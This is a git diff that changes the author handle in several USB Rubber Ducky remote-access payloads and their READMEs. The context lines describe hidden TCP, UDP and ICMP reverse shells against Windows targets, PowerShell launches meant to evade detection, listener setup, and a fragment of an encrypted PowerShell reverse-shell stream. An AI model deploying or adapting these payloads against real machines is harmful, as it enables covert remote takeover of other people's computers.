@@ -50,10 +50,10 @@ Disable ICMP replies by the OS: `sysctl -w net.ipv4.icmp_echo_ignore_all=1`
 Start the client -> `perl PingZhellDucky.pl`
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
 Define the IP of your attacking machine between the quotes at the ATTACKER section
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)

Plug your Ducky into a Windows target.
Achieve reverse shell.
diff --git a/payloads/library/remote_access/PingZhellDucky/payload.txt b/payloads/library/remote_access/PingZhellDucky/payload.txt
index 4e8d257..8b6ab86 100644
--- a/payloads/library/remote_access/PingZhellDucky/payload.txt
+++ b/payloads/library/remote_access/PingZhellDucky/payload.txt
@@ -1,7 +1,7 @@
 REM PingZhellDucky
 REM Version 1.2
 REM OS: Windows & Unix
-REM Author: 0iphor13
+REM Author: 0i41E
 REM Requirements: DuckScript 3.0, Perl
 REM Getting remote access via ICMP or perform the required setup
@@ -54,7 +54,7 @@ REM Do you want to install the dependencies and set up the infratructre?
 REM Will trigger when not using Windows - Best use with Linux
 DEFINE INSTALL TRUE
 REM Link to the PingZhellDucky.pl client - Required for installation
-DEFINE CLIENTLINK https://raw.githubusercontent.com/0iphor13/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
+DEFINE CLIENTLINK https://raw.githubusercontent.com/0i41E/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
 IF ($_OS == WINDOWS) THEN
diff --git a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
index 2f425ec..4a3adee 100644
--- a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
+++ b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
@@ -1,7 +1,7 @@
 REM ReverseDucky
 REM Version 2.0
 REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
-REM Author: 0iphor13
+REM Author: 0i41E
 REM Requirement: DuckyScript 3.0
 REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
diff --git a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
index d71b496..4cb1e4c 100644
--- a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
+++ b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
@@ -1,7 +1,7 @@
 REM ReverseDuckyII
 REM Version 2.0
 REM OS: Windows / Multi
-REM Author: 0iphor13
+REM Author: 0i41E
 REM Requirement: DuckyScript 3.0
 REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
diff --git a/payloads/library/remote_access/ReverseDuckyIII/payload.txt b/payloads/library/remote_access/ReverseDuckyIII/payload.txt
index 8039dd8..12fb17e 100644
--- a/payloads/library/remote_access/ReverseDuckyIII/payload.txt
+++ b/payloads/library/remote_access/ReverseDuckyIII/payload.txt
@@ -1,7 +1,7 @@
 REM ReverseDucky3
 REM Version 1.2 (End of Life - This payload won't be updated anymore)
 REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
-REM Author: 0iphor13
+REM Author: 0i41E
 REM UDP Reverse shell executed in the background. Might create a firewall pop up, but will execute anyway.
 REM Fill in Attacker-IP and Port in Line 18
diff --git a/payloads/library/remote_access/ReverseDuckyPolymorph/README.md b/payloads/library/remote_access/ReverseDuckyPolymorph/README.md
index 65fb083..29bf73a 100644
--- a/payloads/library/remote_access/ReverseDuckyPolymorph/README.md
+++ b/payloads/library/remote_access/ReverseDuckyPolymorph/README.md
@@ -1,6 +1,6 @@
 **Title: ReverseDuckyPolymorph**
-

Author: 0iphor13, Korben
+

Author: 0i41E, Korben
OS: Windows
Version: 1.1
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum

@@ -17,11 +17,11 @@ Using ReverseDuckyPolymorph is easy and straight forward.
 - First, start a listener on your attacking machine via the tool of your choice.
 - Second, define the IP-Address and Port of your listening machine
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/listener.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/listener.png)
 - Third, compile the payload, using payloadstudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
 # Every session you will gain via this payload will result in a different ID to verify a different pattern.
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/ID.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/ID.png)
 Credit for DS 3.0 implentation and ideas:
 - Korben
diff --git a/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt b/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt
index a4e0cdd..153c88e 100644
--- a/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt
+++ b/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt
@@ -1,5 +1,5 @@
 REM Title: ReverseDuckyPolymorph
-REM Author: 0iphor13, Korben
+REM Author: 0i41E, Korben
 REM Version 1.1
 REM Target: Windows / Linux(?) (Not tested with Powershell on Linux)
diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/README.md b/payloads/library/remote_access/ReverseDuckyUltimate/README.md
index 610a934..83f9a42 100644
--- a/payloads/library/remote_access/ReverseDuckyUltimate/README.md
+++ b/payloads/library/remote_access/ReverseDuckyUltimate/README.md
@@ -1,6 +1,6 @@
 # Title: ReverseDuckyUltimate
-

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.0
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum

@@ -12,14 +12,14 @@ Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum

 #
 ## Instruction
-Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
+Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
 - First: Create key.pem & cert.pem like so:
 ```
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
 ```
 It will ask for information about the certificate - Insert whatever you want.
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png)
 - Second: Start a listener on your attacking machine which supports certificates. Examples:
@@ -31,25 +31,25 @@ ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem
 Additionally add an unique identifier to give your Duck a name.
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png)
 - Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
 ## Instruction - Automatic Setup
 - First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use.
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png)
 - Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky.
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png)
 - Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go!
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png)
 #
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png)
 Credit for DS 3.0 implentation and ideas:
 - Daniel Bohannon
diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
index 683e8f7..6496cb0 100644
--- a/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
+++ b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
@@ -1,7 +1,7 @@
 REM ReverseDuckyUltimate
 REM Version 1.3
 REM OS: Windows / Unix
-REM Author: 0iphor13
+REM Author: 0i41E
 REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
 REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed.
@@ -49,10 +49,10 @@ EXTENSION PASSIVE_WINDOWS_DETECT
 END_REM
 END_EXTENSION
-REM Extension ROLLING_POWERSHELL_EXECUTION by 0iphor13 to obfuscate the start of Powershell
+REM Extension ROLLING_POWERSHELL_EXECUTION by 0i41E to obfuscate the start of Powershell
 EXTENSION ROLLING_POWERSHELL_EXECUTION
 REM VERSION 1.0
- REM Author: 0iphor13
+ REM Author: 0i41E
 REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
 REM Requirements: PayloadStudio v.1.3 minimum
 REM Starts Powershell in uncommon ways to avoid basic detection
@@ -131,7 +131,7 @@ END_EXTENSION
 EXTENSION DETECT_FINISHED
 REM VERSION 1.0
- REM AUTHOR: 0iphor13
+ REM AUTHOR: 0i41E
 REM_BLOCK DOCUMENTATION
 USAGE:
@@ -164,7 +164,7 @@ END_EXTENSION
 EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
 REM_BLOCK Version: 1.0
- Author: 0iphor13
+ Author: 0i41E
 Description: Downgrade the default command prompt of Windows 11 to use Conhost again. Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
 END_REM
@@ -380,7 +380,7 @@ ELSE_DEFINED Polymorphism2()
 STRING .GetStream();
 STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));
- STRING $sSL.AuthenticateAsClient('madeby.0iphor13', $null, "Tls12", $false);
+ STRING $sSL.AuthenticateAsClient('madeby.0i41E', $null, "Tls12", $false);
 Polymorphism3()
 STRING =new-object System.IO.StreamWriter($sSL);
 STRING $sSL.write(